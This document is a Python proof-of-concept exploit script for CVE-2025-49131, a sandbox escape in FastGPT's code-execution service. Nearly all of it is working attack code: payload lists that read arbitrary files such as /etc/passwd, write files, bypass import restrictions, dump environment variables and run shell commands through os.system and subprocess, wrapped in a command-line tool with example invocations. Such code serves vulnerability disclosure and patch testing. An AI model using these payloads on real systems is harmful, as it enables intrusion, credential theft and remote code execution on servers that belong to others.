# README.md
# Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2025-49131 - FastGPT Sandbox Escape Proof of Concept
========================================================
Vulnerability: Sandbox Escape via insufficient isolation
Affected: FastGPT fastgpt-sandbox < 4.9.11
CVSS: 6.3 (Medium)
Impact: Read/Write arbitrary files, bypass Python import restrictions
Author: Security Research
Date: 2025-12-30
"""
import argparse
import requests
import json
import base64
import sys
from typing import Optional, Dict, Any
# Colors for output
class Colors:
    """ANSI escape sequences used to colour terminal output."""

    # Bright foreground colours.
    RED = "\033[91m"
    GREEN = "\033[92m"
    YELLOW = "\033[93m"
    BLUE = "\033[94m"
    PURPLE = "\033[95m"
    CYAN = "\033[96m"

    # Attribute controls: RESET clears all styling, BOLD switches on bold.
    RESET = "\033[0m"
    BOLD = "\033[1m"
def banner():
    """Print the coloured ASCII-art title and the CVE summary box to stdout.

    The art is a single f-string; its lines start at column 0 because any
    leading whitespace would become part of the printed text.
    """
    print(f"""{Colors.RED}
███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
█████╗ ███████║███████╗ ██║ ██║ ███╗██████╔╝ ██║
██╔══╝ ██╔══██║╚════██║ ██║ ██║ ██║██╔═══╝ ██║
██║ ██║ ██║███████║ ██║ ╚██████╔╝██║ ██║
╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝
{Colors.YELLOW}
███████╗ █████╗ ███╗ ██╗██████╗ ██████╗ ██████╗ ██╗ ██╗
██╔════╝██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
███████╗███████║██╔██╗ ██║██║ ██║██████╔╝██║ ██║ ╚███╔╝
╚════██║██╔══██║██║╚██╗██║██║ ██║██╔══██╗██║ ██║ ██╔██╗
███████║██║ ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝
{Colors.GREEN}
███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗
██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝
█████╗ ███████╗██║ ███████║██████╔╝█████╗
██╔══╝ ╚════██║██║ ██╔══██║██╔═══╝ ██╔══╝
███████╗███████║╚██████╗██║ ██║██║ ███████╗
╚══════╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚══════╝
{Colors.CYAN}╔═══════════════════════════════════════════════════════════╗
║ CVE-2025-49131 | CVSS 6.3 (Medium) ║
║ FastGPT Sandbox Container Escape ║
║ Affected: < v4.9.11 ║
║ Impact: File R/W, Import Bypass, Remote Code Execution ║
╚═══════════════════════════════════════════════════════════╝{Colors.RESET}
""")
class FastGPTSandboxExploit:
    """Client for probing a FastGPT sandbox endpoint for CVE-2025-49131.

    Every action builds a Python expression string and submits it through
    :meth:`execute_code`, which POSTs it to ``{target}/api/sandbox/run``.
    Each action tries an ordered list of payload variants and stops at the
    first response that is accepted as a success.

    Use only against systems you are authorised to test.
    """

    def __init__(self, target: str, verbose: bool = False):
        """Store the target base URL and prepare a reusable HTTP session.

        Args:
            target: Base URL of the sandbox service; trailing slashes are removed.
            verbose: When true, ``info`` and ``warning`` messages are printed in
                addition to ``success`` and ``error`` messages.
        """
        self.target = target.rstrip('/')
        self.verbose = verbose
        self.session = requests.Session()
        self.session.headers.update({
            'Content-Type': 'application/json',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        })

    @staticmethod
    def _looks_successful(result: Any, markers: tuple = ("error",)) -> bool:
        """Return True when *result* is truthy and contains none of *markers*.

        The endpoint's JSON may carry a non-string value (dict, list, number),
        so the value is stringified before the case-insensitive substring
        search instead of assuming it has ``.lower()``.

        Args:
            result: Value returned by :meth:`execute_code`.
            markers: Lower-case substrings that mark the output as a failure.
        """
        if not result:
            return False
        text = str(result).lower()
        return not any(marker in text for marker in markers)

    def log(self, msg: str, level: str = 'info'):
        """Print *msg* with a coloured ``[LEVEL]`` prefix.

        ``success`` and ``error`` messages are always printed; other levels
        only appear when the instance was created with ``verbose=True``.
        """
        colors = {
            'info': Colors.BLUE,
            'success': Colors.GREEN,
            'error': Colors.RED,
            'warning': Colors.YELLOW
        }
        if self.verbose or level in ['success', 'error']:
            print(f"{colors.get(level, Colors.RESET)}[{level.upper()}]{Colors.RESET} {msg}")

    def check_target(self) -> bool:
        """Return True when ``GET {target}/health`` answers with HTTP 200.

        Any exception raised by the request is logged as an error and
        reported as ``False``.
        """
        try:
            resp = self.session.get(f"{self.target}/health", timeout=10)
            return resp.status_code == 200
        except Exception as e:
            # Deliberately broad: this is a best-effort reachability probe.
            self.log(f"Target unreachable: {e}", 'error')
            return False

    def detect_vulnerability(self) -> Dict[str, Any]:
        """Run read-only probe expressions and summarise the outcome.

        Returns:
            A dict with ``vulnerable`` (bool), ``version`` (always
            ``"unknown"``; nothing in this method updates it) and ``details``,
            a list holding one entry per probe.
        """
        self.log("Checking for CVE-2025-49131 vulnerability...", 'info')
        # Detection payload - tries to access __builtins__
        detection_payloads = [
            {
                "code": "str(type(__builtins__))",
                "description": "Builtins access check"
            },
            {
                "code": "str(dir())",
                "description": "Global namespace check"
            }
        ]
        results = {
            "vulnerable": False,
            "version": "unknown",
            "details": []
        }
        # NOTE(review): a probe "passes" whenever it returns output without the
        # word "error". These expressions look harmless, so a patched sandbox may
        # evaluate them too and be flagged - confirm against a fixed version.
        for payload in detection_payloads:
            try:
                result = self.execute_code(payload["code"])
            except Exception as e:
                results["details"].append({
                    "test": payload["description"],
                    "result": "blocked",
                    "error": str(e)
                })
                continue
            if self._looks_successful(result):
                results["details"].append({
                    "test": payload["description"],
                    "result": "passed",
                    "output": str(result)[:100]
                })
                results["vulnerable"] = True
            else:
                # Record the negative outcome too, so the report has one entry
                # per probe rather than silently omitting failed ones.
                results["details"].append({
                    "test": payload["description"],
                    "result": "blocked",
                    "output": None if result is None else str(result)[:100]
                })
        return results

    def execute_code(self, code: str) -> Optional[Any]:
        """POST *code* to the sandbox run endpoint and return its output.

        Returns:
            The ``result`` field of the JSON response, else its ``output``
            field, else the whole response rendered with ``str()``. The value
            is whatever JSON type the server sent, not necessarily a string.
            ``None`` is returned on a non-200 status or on any exception.
        """
        payload = {
            "code": code,
            "variables": {}
        }
        try:
            resp = self.session.post(
                f"{self.target}/api/sandbox/run",
                json=payload,
                timeout=30
            )
            if resp.status_code == 200:
                data = resp.json()
                return data.get("result", data.get("output", str(data)))
            else:
                self.log(f"Request failed: {resp.status_code}", 'error')
                return None
        except Exception as e:
            # Deliberately broad: network errors, invalid JSON and unexpected
            # response shapes are all reported the same way to the caller.
            self.log(f"Execution error: {e}", 'error')
            return None

    def read_file(self, filepath: str) -> Optional[str]:
        """Try each file-read payload in order and return the first clean output.

        A response is rejected when it is falsy or contains "error" or
        "traceback" (case-insensitive). *filepath* is interpolated into the
        payload text as-is.

        Returns:
            The accepted output, or ``None`` when every payload was rejected.
        """
        self.log(f"Attempting to read: {filepath}", 'info')
        # Multiple file read payloads
        payloads = [
            # Direct open
            f"open('{filepath}', 'r').read()",
            # Builtins bypass
            f"__builtins__.open('{filepath}').read()",
            # Lambda wrapper
            f"(lambda: open('{filepath}').read())()",
            # Getattr bypass
            f"getattr(__builtins__, 'open')('{filepath}').read()",
            # Code object manipulation
            f"exec('result=open(\"{filepath}\").read()') or result",
        ]
        for i, payload in enumerate(payloads, 1):
            self.log(f"Trying payload {i}/{len(payloads)}...", 'info')
            try:
                result = self.execute_code(payload)
                if self._looks_successful(result, ("error", "traceback")):
                    self.log(f"Success with payload {i}!", 'success')
                    return result
            except Exception as e:
                self.log(f"Payload {i} failed: {e}", 'warning')
                continue
        self.log("All file read payloads failed", 'error')
        return None

    def write_file(self, filepath: str, content: str) -> bool:
        """Try each file-write payload in order; return True on the first truthy reply.

        Only backslashes and single quotes in *content* are escaped before it
        is embedded in the payload text.
        """
        self.log(f"Attempting to write to: {filepath}", 'info')
        # Escape content for Python string
        escaped_content = content.replace('\\', '\\\\').replace("'", "\\'")
        payloads = [
            f"open('{filepath}', 'w').write('{escaped_content}')",
            f"__builtins__.open('{filepath}', 'w').write('{escaped_content}')",
        ]
        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
                if result:
                    self.log("File write successful!", 'success')
                    return True
            except Exception as e:
                self.log(f"Payload {i} failed: {e}", 'warning')
                continue
        self.log("All file write payloads failed", 'error')
        return False

    def import_bypass(self, module: str) -> Optional[str]:
        """Try each import payload in order and return the first clean output.

        A response is rejected when it is falsy or contains "error"
        (case-insensitive).

        Returns:
            The accepted output, or ``None`` when every payload was rejected.
        """
        self.log(f"Attempting to import: {module}", 'info')
        payloads = [
            # Direct import
            f"__import__('{module}')",
            # Builtins import
            f"__builtins__.__import__('{module}')",
            # Importlib
            f"__import__('importlib').import_module('{module}')",
            # Exec import
            f"exec('import {module}')",
            # Dict access
            f"__builtins__.__dict__['__import__']('{module}')",
        ]
        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
                if self._looks_successful(result):
                    self.log(f"Import bypass successful with payload {i}!", 'success')
                    return result
            except Exception as e:
                # Report the failure like the sibling methods do instead of
                # discarding it silently.
                self.log(f"Payload {i} failed: {e}", 'warning')
                continue
        self.log("All import bypass payloads failed", 'error')
        return None

    def get_env(self) -> Optional[Any]:
        """Return the first truthy reply from the environment-dump payloads.

        The value is passed through unchanged from :meth:`execute_code`, so
        its type is whatever the server returned. ``None`` is returned when
        no payload produced a truthy reply.
        """
        self.log("Attempting to read environment variables...", 'info')
        payloads = [
            "__import__('os').environ.copy()",
            "dict(__import__('os').environ)",
        ]
        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
                if result:
                    return result
            except Exception as e:
                # A bare ``except:`` would also trap KeyboardInterrupt and
                # SystemExit; catch ordinary errors only and report them.
                self.log(f"Payload {i} failed: {e}", 'warning')
                continue
        return None

    def rce_chain(self, command: str) -> Optional[str]:
        """Try each command-execution payload in order; return the first truthy reply.

        NOTE(review): a falsy reply (for example the number 0) counts as a
        failure and the next payload is tried, so *command* may be submitted
        more than once - confirm this is acceptable for the command used.
        """
        self.log(f"Attempting RCE chain with command: {command}", 'info')
        payloads = [
            # os.system
            f"__import__('os').system('{command}')",
            # os.popen
            f"__import__('os').popen('{command}').read()",
            # subprocess
            f"__import__('subprocess').check_output('{command}', shell=True).decode()",
            # subprocess with Popen
            f"__import__('subprocess').Popen('{command}', shell=True, stdout=-1).communicate()[0].decode()",
        ]
        for i, payload in enumerate(payloads, 1):
            try:
                result = self.execute_code(payload)
                if result:
                    self.log(f"RCE successful with method {i}!", 'success')
                    return result
            except Exception as e:
                self.log(f"RCE method {i} failed: {e}", 'warning')
                continue
        self.log("All RCE payloads failed", 'error')
        return None
def main():
    """Command-line entry point: parse options, run the selected actions, report.

    Each selected action (--detect, --read, --write, --import, --env, --rce)
    runs in that fixed order against --target. Its outcome is printed and
    appended to a results dict, which is written as JSON when --output is
    given. Use only against systems you are authorised to test.
    """
    banner()
    parser = argparse.ArgumentParser(
        description='CVE-2025-49131 - FastGPT Sandbox Escape POC',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
python poc.py --target http://localhost:3001 --detect
python poc.py --target http://localhost:3001 --read /etc/passwd
python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"
python poc.py --target http://localhost:3001 --import os
python poc.py --target http://localhost:3001 --rce "id"
"""
    )
    parser.add_argument('--target', '-t', required=True, help='Target FastGPT sandbox URL')
    parser.add_argument('--detect', '-d', action='store_true', help='Detect vulnerability (non-destructive)')
    parser.add_argument('--read', '-r', help='File path to read')
    parser.add_argument('--write', '-w', help='File path to write')
    parser.add_argument('--content', '-c', default='CVE-2025-49131 POC', help='Content to write')
    parser.add_argument('--import', '-i', dest='import_module', help='Module to import')
    parser.add_argument('--env', '-e', action='store_true', help='Read environment variables')
    parser.add_argument('--rce', help='Command to execute (RCE)')
    parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
    parser.add_argument('--output', '-o', help='Output file for results')
    args = parser.parse_args()

    exploit = FastGPTSandboxExploit(args.target, args.verbose)
    results = {"target": args.target, "cve": "CVE-2025-49131", "actions": []}

    # Without this hint a run with no action flag would only print the closing
    # "completed" line, which reads as if something had been executed.
    if not any((args.detect, args.read, args.write, args.import_module, args.env, args.rce)):
        print(f"{Colors.YELLOW}[-] No action selected; use --help to list the available options{Colors.RESET}")

    if args.detect:
        print(f"\n{Colors.CYAN}[*] Running vulnerability detection...{Colors.RESET}")
        detect_result = exploit.detect_vulnerability()
        results["detection"] = detect_result
        if detect_result["vulnerable"]:
            print(f"{Colors.GREEN}[+] TARGET IS VULNERABLE!{Colors.RESET}")
        else:
            print(f"{Colors.YELLOW}[-] Target may be patched or not vulnerable{Colors.RESET}")
        print(json.dumps(detect_result, indent=2))

    if args.read:
        print(f"\n{Colors.CYAN}[*] Reading file: {args.read}{Colors.RESET}")
        content = exploit.read_file(args.read)
        if content:
            print(f"{Colors.GREEN}[+] File content:{Colors.RESET}")
            print("-" * 50)
            print(content)
            print("-" * 50)
            # The reply is whatever JSON value the server sent, so stringify
            # before truncating instead of assuming it can be sliced.
            results["actions"].append({"type": "read", "file": args.read, "success": True, "content": str(content)[:500]})
        else:
            results["actions"].append({"type": "read", "file": args.read, "success": False})

    if args.write:
        print(f"\n{Colors.CYAN}[*] Writing to file: {args.write}{Colors.RESET}")
        success = exploit.write_file(args.write, args.content)
        results["actions"].append({"type": "write", "file": args.write, "success": success})
        if success:
            print(f"{Colors.GREEN}[+] File written successfully!{Colors.RESET}")

    if args.import_module:
        print(f"\n{Colors.CYAN}[*] Attempting import bypass: {args.import_module}{Colors.RESET}")
        result = exploit.import_bypass(args.import_module)
        results["actions"].append({"type": "import", "module": args.import_module, "success": bool(result)})
        if result:
            print(f"{Colors.GREEN}[+] Import bypass successful: {result}{Colors.RESET}")

    if args.env:
        print(f"\n{Colors.CYAN}[*] Reading environment variables...{Colors.RESET}")
        env = exploit.get_env()
        if env:
            print(f"{Colors.GREEN}[+] Environment:{Colors.RESET}")
            print(env)
        # Record the outcome either way, matching the read and rce actions.
        results["actions"].append({"type": "env", "success": bool(env)})

    if args.rce:
        print(f"\n{Colors.CYAN}[*] Attempting RCE: {args.rce}{Colors.RESET}")
        output = exploit.rce_chain(args.rce)
        if output:
            print(f"{Colors.GREEN}[+] Command output:{Colors.RESET}")
            print("-" * 50)
            print(output)
            print("-" * 50)
            results["actions"].append({"type": "rce", "command": args.rce, "success": True, "output": output})
        else:
            results["actions"].append({"type": "rce", "command": args.rce, "success": False})

    if args.output:
        # Explicit encoding so the report does not depend on the platform's
        # default locale.
        with open(args.output, 'w', encoding='utf-8') as f:
            json.dump(results, f, indent=2)
        print(f"\n{Colors.GREEN}[+] Results saved to: {args.output}{Colors.RESET}")

    print(f"\n{Colors.PURPLE}[*] Exploit completed.{Colors.RESET}")
# Run the CLI only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()